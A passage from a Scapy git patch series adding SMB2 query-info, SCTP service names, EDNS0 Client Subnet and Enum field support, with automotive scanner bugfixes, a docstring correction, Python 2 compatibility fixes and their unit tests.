_SMB2_IOCTL_PacketLenField( + "Output", None, conf.raw_layer, + length_from=lambda pkt: pkt.OutputLen), + ], + ), ] + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Input": 24, + "Output": 36, + }) + pay + bind_top_down( SMB2_Header, @@ -711,3 +1294,123 @@ class SMB2_IOCTL_Response(Packet): Command=0x000B, Flags=1 # SMB2_FLAGS_SERVER_TO_REDIR ) + +# sect 2.2.37 + + +class FILE_GET_QUOTA_INFORMATION(Packet): + fields_desc = [ + IntField("NextEntryOffset", 0), + FieldLenField("SidLength", None, length_of="Sid"), + StrLenField("Sid", b"", length_from=lambda x: x.SidLength), + StrLenField("pad", b"", + length_from=lambda x: ((x.NextEntryOffset - + x.SidLength) + if x.NextEntryOffset else 0)) + ] + + +class SMB2_Query_Quota_Info(Packet): + fields_desc = [ + ByteField("ReturnSingle", 0), + ByteField("ReturnBoolean", 0), + ShortField("Reserved", 0), + LEIntField("SidListLength", 0), + LEIntField("StartSidLength", 0), + LEIntField("StartSidOffset", 0), + StrLenField("pad", b"", length_from=lambda x: x.StartSidOffset), + MultipleTypeField( + [ + (PacketListField("SidBuffer", [], FILE_GET_QUOTA_INFORMATION, + length_from=lambda x: x.SidListLength), + lambda x: x.SidListLength), + (StrLenField("SidBuffer", b"", + length_from=lambda x: x.StartSidLength), + lambda x: x.StartSidLength) + ], + StrFixedLenField("SidBuffer", b"", length=0) + ) + ] + + +class SMB2_Query_Info_Request(Packet): + name = "SMB2 QUERY INFO Request" + OFFSET = 40 + 64 + fields_desc = [ + XLEShortField("StructureSize", 0x29), + ByteEnumField("InfoType", 0, { + 0x01: "SMB2_0_INFO_FILE", + 0x02: "SMB2_0_INFO_FILESYSTEM", + 0x03: "SMB2_0_INFO_SECURITY", + 0x04: "SMB2_0_INFO_QUOTA", + }), + ByteEnumField("FileInfoClass", 0, FileInformationClasses), + LEIntField("OutputBufferLength", 0), + XLEIntField("InputBufferOffset", None), # Short + Reserved = Int + LEIntField("InputLen", None), + FlagsField("AdditionalInformation", 0, -32, { + 0x00000001: "OWNER_SECURITY_INFORMATION", + 0x00000002: "GROUP_SECURITY_INFORMATION", + 0x00000004: "DACL_SECURITY_INFORMATION", + 0x00000008: "SACL_SECURITY_INFORMATION", + 0x00000010: "LABEL_SECURITY_INFORMATION", + 0x00000020: "ATTRIBUTE_SECURITY_INFORMATION", + 0x00000040: "SCOPE_SECURITY_INFORMATION", + 0x00010000: "BACKUP_SECURITY_INFORMATION", + }), + FlagsField("Flags", 0, -32, { + 0x00000001: "SL_RESTART_SCAN", + 0x00000002: "SL_RETURN_SINGLE_ENTRY", + 0x00000004: "SL_INDEX_SPECIFIED", + }), + PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + PacketListField( + "Input", None, SMB2_Query_Quota_Info, + length_from=lambda pkt: pkt.InputLen), + ]) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Input": 4, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Query_Info_Request, + Command=0x00010, +) + + +class SMB2_Query_Info_Response(Packet): + name = "SMB2 QUERY INFO Response" + OFFSET = 8 + 64 + fields_desc = [ + XLEShortField("StructureSize", 0x9), + LEShortField("OutputBufferOffset", None), + LEIntField("OutputLen", None), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + # TODO + StrFixedLenField("Output", b"", + length_from=lambda pkt: pkt.OutputLen) + ]) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Output": 2, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Query_Info_Response, + Command=0x00010, + Flags=1, +) diff --git a/scapy/layers/tls/crypto/hash.py b/scapy/layers/tls/crypto/hash.py index 8ff30385603..0a427b27907 100644 --- a/scapy/layers/tls/crypto/hash.py +++ b/scapy/layers/tls/crypto/hash.py @@ -7,7 +7,7 @@ Hash classes. """ -from __future__ import absolute_import +import hashlib from hashlib import md5, sha1, sha224, sha256, sha384, sha512 import scapy.libs.six as six @@ -42,6 +42,11 @@ def digest(self, tbd): return b"" +class Hash_MD4(_GenericHash): + hash_cls = lambda _, x: hashlib.new('md4', x) + hash_len = 16 + + class Hash_MD5(_GenericHash): hash_cls = md5 hash_len = 16 diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index 7320e8fc79b..894f9edb128 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -21,10 +21,9 @@ assert smb2.Command == 0 assert smb2.CreditsRequested == 0 assert smb2.Flags == 0 assert smb2.NextCommand == 0 -assert smb2.MessageId == 0 -assert smb2.AsyncId == 0 +assert smb2.MID == 0 assert smb2.SessionId == 0 -assert smb2.SecuritySignature == 0xffeeddccbbaa99887766554433221100 +assert smb2.SecuritySignature == b'\x00\x11"3DUfw\x88\x99\xaa\xbb\xcc\xdd\xee\xff' # KO test rawpkt = b'\x45\x00\x01\x18\x16\x2c\x40\x00\x37\x06\xc4\x14\x91\xdc\x18\x13\xc0\xa8\xfe\x07\x9d\x76\x01\xbd\x37\x06\x5e\x82\xa3\xca\x83\xd2\x50\x18\x01\xf6\x11\x5b\x00\x00\x00\x00\x00\xec\xf0\x53\x4d\x42\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff\x24\x00\x04\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x59\x9e\x84\xf1\x9d\x61\xce\x99\x1f\x50\x5c\x04\x44\x74\xb1\x0a\x70\x00\x00\x00\x04\x00\x00\x00\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x00\x00\x01\x00\x26\x00\x00\x00\x00\x00\x01\x00\x20\x00\x01\x00\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x59\xc5\x5c\xd2\x82\x51\x06\x32\x7a\x6e\x2e\x41\xc5\xa8\x3f\xdd\xf2\xc5\x18\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x03\x00\x10\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x1c\x00\x00\x00\x00\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00\x31\x00\x37\x00\x38\x00\x2e\x00\x32\x00\x31\x00' @@ -377,3 +376,23 @@ assert isinstance(setup_sess.Buffer[0][1].token.responseToken.value, NTLM_CHALLE assert setup_sess.Buffer[0][1].token.responseToken.value assert setup_sess.Buffer[0][1].token.responseToken.value.Payload[0] == ('TargetName', 'WIN1') assert setup_sess.Buffer[0][1].token.responseToken.value.Payload[1][1][-1].AvId == 0 + + += SMB2 IOCTL Request + +ioctl_req = Ether(b'RT\x00 Date: Sat, 25 Jun 2022 12:12:26 +0200 Subject: [PATCH 0829/1632] Support SCTP service names (#3656) --- scapy/config.py | 3 +++ scapy/data.py | 48 ++++++++++++++++++++++++++++---------------- scapy/layers/sctp.py | 5 +++-- test/regression.uts | 5 ++++- 4 files changed, 41 insertions(+), 20 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index 2e1d7a84689..544cbffb4da 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -902,6 +902,9 @@ def __getattribute__(self, attr): if attr == "services_tcp": from scapy.data import TCP_SERVICES return TCP_SERVICES + if attr == "services_sctp": + from scapy.data import SCTP_SERVICES + return SCTP_SERVICES if attr == "iface6": warnings.warn( "conf.iface6 is deprecated in favor of conf.iface", diff --git a/scapy/data.py b/scapy/data.py index 5d2d37f5397..f9657bc23b6 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -9,7 +9,6 @@ import calendar import os -import re import warnings @@ -293,7 +292,6 @@ def load_protocols(filename, _fallback=None, _integer_base=10, _cls=DADict[int, str]): # type: (str, Optional[bytes], int, type) -> DADict[int, str] """"Parse /etc/protocols and return values as a dictionary.""" - spaces = re.compile(b"[ \t]+|\n") dct = _cls(_name=filename) # type: DADict[int, str] def _process_data(fdesc): @@ -306,7 +304,7 @@ def _process_data(fdesc): line = line.strip() if not line: continue - lt = tuple(re.split(spaces, line)) + lt = tuple(line.split()) if len(lt) < 2 or not lt[0]: continue dct[int(lt[1], _integer_base)] = fixname(lt[0]) @@ -367,10 +365,15 @@ def load_ethertypes(filename): def load_services(filename): - # type: (str) -> Tuple[DADict[int, str], DADict[int, str]] - spaces = re.compile(b"[ \t]+|\n") + # type: (str) -> Tuple[DADict[int, str], DADict[int, str], DADict[int, str]] # noqa: E501 tdct = DADict(_name="%s-tcp" % filename) # type: DADict[int, str] udct = DADict(_name="%s-udp" % filename) # type: DADict[int, str] + sdct = DADict(_name="%s-sctp" % filename) # type: DADict[int, str] + dcts = { + b"tcp": tdct, + b"udp": udct, + b"sctp": sdct, + } try: with open(filename, "rb") as fdesc: for line in fdesc: @@ -381,17 +384,16 @@ def load_services(filename): line = line.strip() if not line: continue - lt = tuple(re.split(spaces, line)) + lt = tuple(line.split()) if len(lt) < 2 or not lt[0]: continue - dtct = None - if lt[1].endswith(b"/tcp"): - dtct = tdct - elif lt[1].endswith(b"/udp"): - dtct = udct - else: + if b"/" not in lt[1]: + continue + port, proto = lt[1].split(b"/", 1) + try: + dtct = dcts[proto] + except KeyError: continue - port = lt[1].split(b'/')[0] name = fixname(lt[0]) if b"-" in port: sport, eport = port.split(b"-") @@ -408,7 +410,7 @@ def load_services(filename): ) except IOError: log_loading.info("Can't open /etc/services file") - return tdct, udct + return tdct, udct, sdct class ManufDA(DADict[str, Tuple[str, str]]): @@ -507,15 +509,27 @@ def select_path(directories, filename): if WINDOWS: - IP_PROTOS = load_protocols(os.environ["SystemRoot"] + "\\system32\\drivers\\etc\\protocol") # noqa: E501 - TCP_SERVICES, UDP_SERVICES = load_services(os.environ["SystemRoot"] + "\\system32\\drivers\\etc\\services") # noqa: E501 + IP_PROTOS = load_protocols(os.path.join( + os.environ["SystemRoot"], + "system32", + "drivers", + "etc", + "protocol", + )) + TCP_SERVICES, UDP_SERVICES, SCTP_SERVICES = load_services(os.path.join( + os.environ["SystemRoot"], + "system32", + "drivers", + "etc", + "services", + )) # Default values, will be updated by arch.windows ETHER_TYPES = load_ethertypes(None) MANUFDB = ManufDA() else: IP_PROTOS = load_protocols("/etc/protocols") ETHER_TYPES = load_ethertypes("/etc/ethertypes") - TCP_SERVICES, UDP_SERVICES = load_services("/etc/services") + TCP_SERVICES, UDP_SERVICES, SCTP_SERVICES = load_services("/etc/services") MANUFDB = ManufDA() manuf_path = select_path( ['/usr', '/usr/local', '/opt', '/opt/wireshark', diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index 3ef27082e56..e5128db7587 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -35,6 +35,7 @@ XIntField, XShortField, ) +from scapy.data import SCTP_SERVICES from scapy.layers.inet import IP, IPerror from scapy.layers.inet6 import IP6Field, IPv6, IPerror6 @@ -243,8 +244,8 @@ def default_payload_class(self, p): class SCTP(_SCTPChunkGuessPayload, Packet): - fields_desc = [ShortField("sport", 0), - ShortField("dport", 0), + fields_desc = [ShortEnumField("sport", 0, SCTP_SERVICES), + ShortEnumField("dport", 0, SCTP_SERVICES), XIntField("tag", 0), XIntField("chksum", None), ] diff --git a/test/regression.uts b/test/regression.uts index e23f311db94..4d3d9ec5242 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -885,6 +885,7 @@ scapy_delete_temp_files() = Test load_services data_services = """ +itu-bicc-stc 3097/sctp cvsup 5999/udp # CVSup x11 6000-6063/tcp # X Window System x11 6000-6063/udp # X Window System @@ -895,13 +896,15 @@ services = get_temp_file() with open(services, "w") as w: w.write(data_services) -tcp, udp = load_services(services) +tcp, udp, sctp = load_services(services) assert tcp[6002] == "x11" assert tcp.ndl_ahp_svc == 6064 assert tcp.x11 in range(6000, 6093) assert udp[6002] == "x11" assert udp.x11 in range(6000, 6093) assert udp.cvsup == 5999 +assert sctp[3097] == "itu_bicc_stc" +assert sctp.itu_bicc_stc == 3097 scapy_delete_temp_files() From 7295c0a0413e6810ab2deda02cd451132a89507e Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 25 Jun 2022 13:10:22 +0200 Subject: [PATCH 0830/1632] Minor bugfixes in Automotive Scanners (#3661) * Automotive Scanner minor bugfix * remove private property --- scapy/contrib/automotive/scanner/enumerator.py | 3 +-- scapy/contrib/automotive/scanner/executor.py | 14 +++++++------- 2 files changed, 8 insertions(+), 9 deletions(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 232b8b7a398..26aaf73254d 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -272,12 +272,11 @@ def execute(self, socket, state, **kwargs): return if count is not None: + count -= 1 if count <= 0: log_interactive.debug( "[i] Finished execution count of enumerator") return - else: - count -= 1 if (start_time + execution_time) < time.time(): log_interactive.debug( diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index fdfa71e68fc..fac15cd5f92 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -43,7 +43,7 @@ class AutomotiveTestCaseExecutor: AutomotiveTestCaseExecutorConfiguration instance """ @property - def __initial_ecu_state(self): + def _initial_ecu_state(self): # type: () -> EcuState return EcuState(session=1) @@ -64,7 +64,7 @@ def __init__( else: self.socket = socket - self.target_state = self.__initial_ecu_state + self.target_state = self._initial_ecu_state self.reset_handler = reset_handler self.reconnect_handler = reconnect_handler @@ -108,11 +108,11 @@ def state_paths(self): objects. :return: A list of paths. """ - paths = [Graph.dijkstra(self.state_graph, self.__initial_ecu_state, s) + paths = [Graph.dijkstra(self.state_graph, self._initial_ecu_state, s) for s in self.state_graph.nodes - if s != self.__initial_ecu_state] + if s != self._initial_ecu_state] return sorted( - [p for p in paths if p is not None] + [[self.__initial_ecu_state]], + [p for p in paths if p] + [[self._initial_ecu_state]], key=lambda x: x[-1]) @property @@ -136,7 +136,7 @@ def reset_target(self): log_interactive.info("[i] Target reset") if self.reset_handler: self.reset_handler() - self.target_state = self.__initial_ecu_state + self.target_state = self._initial_ecu_state def reconnect(self): # type: () -> None @@ -270,7 +270,7 @@ def enter_state_path(self, path): :param path: Path to be applied to the scan target. :return: True, if all transition functions could be executed. """ - if path[0] != self.__initial_ecu_state: + if path[0] != self._initial_ecu_state: raise Scapy_Exception( "Initial state of path not equal reset state of the target") From 59e162624db04e30f8d0bf1bc7ab5d365a9f033d Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 25 Jun 2022 13:36:25 +0200 Subject: [PATCH 0831/1632] EDNS0 clientsubnet (#3447) * EDN0 ClientSubnet support * Fix dispatcher * EDNS0ClientSubnet unit tests * Python2 fixes --- scapy/layers/dns.py | 129 ++++++++++++++++++++++++++++++-- test/scapy/layers/dns_edns0.uts | 20 +++++ 2 files changed, 141 insertions(+), 8 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 8ce7e75c87c..757836c5530 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -8,25 +8,39 @@ """ from __future__ import absolute_import +import operator +import socket import struct import time import warnings +from scapy.ansmachine import AnsweringMachine +from scapy.base_classes import Net from scapy.config import conf -from scapy.packet import Packet, bind_layers, NoPayload +from scapy.compat import orb, raw, chb, bytes_encode, plain_str +from scapy.error import log_runtime, warning, Scapy_Exception +from scapy.packet import Packet, bind_layers, NoPayload, Raw from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ ConditionalField, Field, FieldLenField, FlagsField, IntField, \ PacketListField, ShortEnumField, ShortField, StrField, \ - StrLenField, MultipleTypeField, UTCTimeField -from scapy.compat import orb, raw, chb, bytes_encode -from scapy.ansmachine import AnsweringMachine + StrLenField, MultipleTypeField, UTCTimeField, I from scapy.sendrecv import sr1 +from scapy.pton_ntop import inet_ntop, inet_pton + from scapy.layers.inet import IP, DestIPField, IPField, UDP, TCP from scapy.layers.inet6 import DestIP6Field, IP6Field -from scapy.error import log_runtime, warning, Scapy_Exception import scapy.libs.six as six +from scapy.compat import ( + Any, + Optional, + Tuple, + Type, + Union, +) + + # https://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4 dnstypes = { 0: "ANY", @@ -520,15 +534,33 @@ def pre_dissect(self, s): # RFC 2671 - Extension Mechanisms for DNS (EDNS0) +edns0types = {0: "Reserved", 1: "LLQ", 2: "UL", 3: "NSID", 4: "Reserved", + 5: "PING", 8: "edns-client-subnet"} + + class EDNS0TLV(Packet): name = "DNS EDNS0 TLV" - fields_desc = [ShortEnumField("optcode", 0, {0: "Reserved", 1: "LLQ", 2: "UL", 3: "NSID", 4: "Reserved", 5: "PING"}), # noqa: E501 + fields_desc = [ShortEnumField("optcode", 0, edns0types), FieldLenField("optlen", None, "optdata", fmt="H"), - StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] # noqa: E501 + StrLenField("optdata", "", + length_from=lambda pkt: pkt.optlen)] def extract_padding(self, p): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] return "", p + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + # type: (Optional[bytes], *Any, **Any) -> Type[Packet] + if _pkt is None: + return EDNS0TLV + if len(_pkt) < 2: + return Raw + edns0type = struct.unpack("!H", _pkt[:2])[0] + if edns0type == 8: + return EDNS0ClientSubnet + return EDNS0TLV + class DNSRROPT(InheritOriginDNSStrPacket): name = "DNS OPT Resource Record" @@ -541,7 +573,88 @@ class DNSRROPT(InheritOriginDNSStrPacket): BitEnumField("z", 32768, 16, {32768: "D0"}), # D0 means DNSSEC OK from RFC 3225 FieldLenField("rdlen", None, length_of="rdata", fmt="H"), - PacketListField("rdata", [], EDNS0TLV, length_from=lambda pkt: pkt.rdlen)] # noqa: E501 + PacketListField("rdata", [], EDNS0TLV, + length_from=lambda pkt: pkt.rdlen)] + + +# RFC 7871 - Client Subnet in DNS Queries + +class ClientSubnetv4(StrLenField): + af_familly = socket.AF_INET + af_length = 32 + af_default = b"\xc0" # 192.0.0.0 + + def getfield(self, pkt, s): + # type: (Packet, bytes) -> Tuple[bytes, I] + sz = operator.floordiv(self.length_from(pkt), 8) + sz = min(sz, operator.floordiv(self.af_length, 8)) + return s[sz:], self.m2i(pkt, s[:sz]) + + def m2i(self, pkt, x): + # type: (Optional[Packet], bytes) -> str + padding = self.af_length - self.length_from(pkt) + if padding: + x += b"\x00" * operator.floordiv(padding, 8) + x = x[: operator.floordiv(self.af_length, 8)] + return inet_ntop(self.af_familly, x) + + def _pack_subnet(self, subnet): + # type: (bytes) -> bytes + packed_subnet = inet_pton(self.af_familly, plain_str(subnet)) + for i in list(range(operator.floordiv(self.af_length, 8)))[::-1]: + if orb(packed_subnet[i]) != 0: + i += 1 + break + return packed_subnet[:i] + + def i2m(self, pkt, x): + # type: (Optional[Packet], Optional[Union[str, Net]]) -> bytes + if x is None: + return self.af_default + try: + return self._pack_subnet(x) + except (OSError, socket.error): + pkt.family = 2 + return ClientSubnetv6("", "")._pack_subnet(x) + + def i2len(self, pkt, x): + # type: (Packet, Any) -> int + if x is None: + return 1 + try: + return len(self._pack_subnet(x)) + except (OSError, socket.error): + pkt.family = 2 + return len(ClientSubnetv6("", "")._pack_subnet(x)) + + +class ClientSubnetv6(ClientSubnetv4): + af_familly = socket.AF_INET6 + af_length = 128 + af_default = b"\x20" # 2000:: + + +class EDNS0ClientSubnet(Packet): + name = "DNS EDNS0 Client Subnet" + fields_desc = [ShortEnumField("optcode", 8, edns0types), + FieldLenField("optlen", None, "address", fmt="H", + adjust=lambda pkt, x: x + 4), + ShortField("family", 1), + FieldLenField("source_plen", None, + length_of="address", + fmt="B", + adjust=lambda pkt, x: x * 8), + ByteField("scope_plen", 0), + MultipleTypeField( + [(ClientSubnetv4("address", "192.168.0.0", + length_from=lambda p: p.source_plen), + lambda pkt: pkt.family == 1), + (ClientSubnetv6("address", "2001:db8::", + length_from=lambda p: p.source_plen), + lambda pkt: pkt.family == 2)], + ClientSubnetv4("address", "192.168.0.0", + length_from=lambda p: p.source_plen))] + # RFC 4034 - Resource Records for the DNS Security Extensions diff --git a/test/scapy/layers/dns_edns0.uts b/test/scapy/layers/dns_edns0.uts index d35871b9c86..143957db38e 100644 --- a/test/scapy/layers/dns_edns0.uts +++ b/test/scapy/layers/dns_edns0.uts @@ -69,3 +69,23 @@ def _test(): len(r.ar) and DNSRROPT in r.ar and len(r.ar[DNSRROPT].rdata) and len([x for x in r.ar[DNSRROPT].rdata if x.optcode == 3]) retry_test(_test) + + ++ EDNS0 - Client Subnet + += Basic instantiation & dissection + +raw_d = b'\x00\x00)\x10\x00\x00\x00\x00\x00\x00\n\x00\x08\x00\x06\x00\x01\x10\x00\xc0\xa8' + +d = DNSRROPT(z=0, rdata=[EDNS0ClientSubnet()]) +assert raw(d) == raw_d + +d = DNSRROPT(raw_d) +assert EDNS0ClientSubnet in d.rdata[0] and d.rdata[0].family == 1 and d.rdata[0].address == "192.168.0.0" + +raw_d = b'\x00\x00)\x10\x00\x00\x00\x00\x00\x00\x0c\x00\x08\x00\x08\x00\x02 \x00 \x01\r\xb8' +d = DNSRROPT(z=0, rdata=[EDNS0ClientSubnet(address="2001:db8::")]) +assert raw(d) == raw_d + +d = DNSRROPT(raw_d) +assert EDNS0ClientSubnet in d.rdata[0] and d.rdata[0].family == 2 and d.rdata[0].address == "2001:db8::" From 6b2e9fcccbe53120dd83a8f2fe1a9660d629f6d4 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 27 Jun 2022 13:34:56 +0200 Subject: [PATCH 0832/1632] Update regression tests instructions in template --- .github/PULL_REQUEST_TEMPLATE.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md index be300774b6f..b76164695de 100644 --- a/.github/PULL_REQUEST_TEMPLATE.md +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -5,7 +5,7 @@ - [ ] If you are new to Scapy: I have checked [CONTRIBUTING.md](https://github.com/secdev/scapy/blob/master/CONTRIBUTING.md) (esp. section submitting-pull-requests) - [ ] I squashed commits belonging together - [ ] I added unit tests or explained why they are not relevant -- [ ] I executed the regression tests for Python2 and Python3 (using `tox` or, `cd test && ./run_tests_py2, cd test && ./run_tests_py3`) +- [ ] I executed the regression tests (using `cd test && ./run_tests` or `tox`) - [ ] If the PR is still not finished, please create a [Draft Pull Request](https://github.blog/2019-02-14-introducing-draft-pull-requests/) From ba9fff214a568d9255fb4f01c563d73ac727cf5d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 28 Jun 2022 19:08:48 +0200 Subject: [PATCH 0833/1632] Set flake's max-line-length to 88 (black) (#3669) * Set flake's max-line-length to 88 (black) --- tox.ini | 1 + 1 file changed, 1 insertion(+) diff --git a/tox.ini b/tox.ini index 67b4e07a72d..f9d58a08dea 100644 --- a/tox.ini +++ b/tox.ini @@ -140,6 +140,7 @@ commands = flake8 scapy/ # flake8 configuration [flake8] ignore = E731, W504 +max-line-length = 88 per-file-ignores = scapy/all.py:F403,F401 scapy/asn1/mib.py:E501 From 9f58cd394d869852d161c5c5dbbdc30652126d7c Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 27 Jun 2022 12:43:59 +0200 Subject: [PATCH 0834/1632] Support Python34 Enums in EnumField --- scapy/fields.py | 34 +++++++++++++++++++++++++--------- test/fields.uts | 20 ++++++++++++++++++++ 2 files changed, 45 insertions(+), 9 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index f3f084aa5af..fa71e9c6b98 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -42,6 +42,11 @@ import scapy.libs.six as six from scapy.libs.six import integer_types +try: + from enum import Enum +except ImportError: + Enum = None # type: ignore + # Typing imports from scapy.compat import ( Any, @@ -2371,7 +2376,7 @@ class _EnumField(Field[Union[List[I], I], I]): def __init__(self, name, # type: str default, # type: Optional[I] - enum, # type: Union[Dict[I, str], Dict[str, I], List[str], DADict[I, str], Tuple[Callable[[I], str], Callable[[str], I]]] # noqa: E501 + enum, # type: Union[Dict[I, str], Dict[str, I], List[str], DADict[I, str], Type[Enum], Tuple[Callable[[I], str], Callable[[str], I]]] # noqa: E501 fmt="H", # type: str ): # type: (...) -> None @@ -2379,14 +2384,14 @@ def __init__(self, @param name: name of this field @param default: default value of this field - @param enum: either a dict or a tuple of two callables. Dict keys are # noqa: E501 - the internal values, while the dict values are the - user-friendly representations. If the tuple is provided, # noqa: E501 - the first callable receives the internal value as - parameter and returns the user-friendly representation - and the second callable does the converse. The first - callable may return None to default to a literal string - (repr()) representation. + @param enum: either an enum, a dict or a tuple of two callables. + Dict keys are the internal values, while the dict + values are the user-friendly representations. If the + tuple is provided, the first callable receives the + internal value as parameter and returns the + user-friendly representation and the second callable + does the converse. The first callable may return None + to default to a literal string (repr()) representation. @param fmt: struct.pack format used to parse and serialize the internal value from and to machine representation. """ @@ -2398,6 +2403,17 @@ def __init__(self, self.s2i_cb = enum[1] # type: Optional[Callable[[str], I]] self.i2s = None # type: Optional[Dict[I, str]] self.s2i = None # type: Optional[Dict[str, I]] + elif Enum and isinstance(enum, type) and issubclass(enum, Enum): + # Python's Enum + i2s = self.i2s = {} + s2i = self.s2i = {} + self.i2s_cb = None + self.s2i_cb = None + names = [x.name for x in enum] + for n in names: + value = enum[n].value + i2s[value] = n + s2i[n] = value else: i2s = self.i2s = {} s2i = self.s2i = {} diff --git a/test/fields.uts b/test/fields.uts index 729a7d9ea8e..3f4a82659ed 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -1122,6 +1122,26 @@ assert(fcb.i2repr_one(None, RandNum(0, 10)) == '') True += EnumField with Enum +~ python3_only + +# not available on Python 2... + +from enum import Enum + +class JUICE(Enum): + APPLE = 0 + ORANGE = 1 + PINEAPPLE = 2 + + +class Breakfast(Packet): + fields_desc = [EnumField("juice", 1, JUICE, fmt="H")] + + +assert raw(Breakfast(juice="ORANGE")) == b"\x00\x01" + + ############ ############ + CharEnumField tests From fe15c4282a145a9c3edeb99b86002cd1926785a0 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 30 Jun 2022 10:40:31 +0200 Subject: [PATCH 0835/1632] Fix documentation in uds_scan.py (#3668) --- scapy/contrib/automotive/uds_scan.py | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index b0115c059ce..ad6ab37c06d 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -1163,10 +1163,14 @@ class UDS_Scanner(AutomotiveTestCaseExecutor): >>> def reconnect(): >>> return UDS_DoIPSocket("169.254.186.237") >>> - >>> es = [UDS_ServiceEnumerator, UDS_WDBISelectiveEnumerator] + >>> es = [UDS_ServiceEnumerator, UDS_DSCEnumerator] + >>> + >>> def reset(): + >>> reconnect().sr1(UDS()/UDS_ER(resetType="hardReset"), + >>> verbose=False, timeout=1) >>> >>> s = UDS_Scanner(reconnect(), reconnect_handler=reconnect, - >>> reset_handler=reset_ecu, test_cases=es, + >>> reset_handler=reset, test_cases=es, >>> UDS_DSCEnumerator_kwargs={ >>> "timeout": 20, >>> "overwrite_timeout": False, From 48a9052d89dc243c55ed1fa90ef9d9f89c0f3dda Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 30 Jun 2022 15:19:46 +0200 Subject: [PATCH 0836/1632] Fix RTPS on Python2 --- scapy/contrib/rtps/common_types.py | 66 +++++++++++++----------------- scapy/contrib/rtps/pid_types.py | 6 +-- scapy/contrib/rtps/rtps.py | 22 +++------- test/contrib/{rtps => }/rtps.uts | 10 ++--- 4 files changed, 41 insertions(+), 63 deletions(-) rename test/contrib/{rtps => }/rtps.uts (98%) diff --git a/scapy/contrib/rtps/common_types.py b/scapy/contrib/rtps/common_types.py index 95d00706dd8..0475c5682fa 100644 --- a/scapy/contrib/rtps/common_types.py +++ b/scapy/contrib/rtps/common_types.py @@ -55,7 +55,7 @@ def is_le(pkt): return False -def e_flags(pkt: Packet) -> str: +def e_flags(pkt): if is_le(pkt): return FORMAT_LE else: @@ -118,9 +118,9 @@ class EPacket(Packet): __slots__ = ["endianness"] - def __init__(self, *args, endianness=None, **kwargs): - self.endianness = endianness - super().__init__(*args, **kwargs) + def __init__(self, *args, **kwargs): + self.endianness = kwargs.pop("endianness", None) + super(EPacket, self).__init__(*args, **kwargs) def extract_padding(self, p): return b"", p @@ -133,18 +133,11 @@ class EPacketField(PacketField): __slots__ = ["endianness", "endianness_from", "fuzz_fun"] - def __init__( - self, - *args, - fuzz_fun=fuzz, - endianness=None, - endianness_from=e_flags, - **kwargs, - ): - self.endianness = endianness - self.endianness_from = endianness_from - self.fuzz_fun = fuzz_fun - super().__init__(*args, **kwargs) + def __init__(self, *args, **kwargs): + self.endianness = kwargs.pop("endianness", 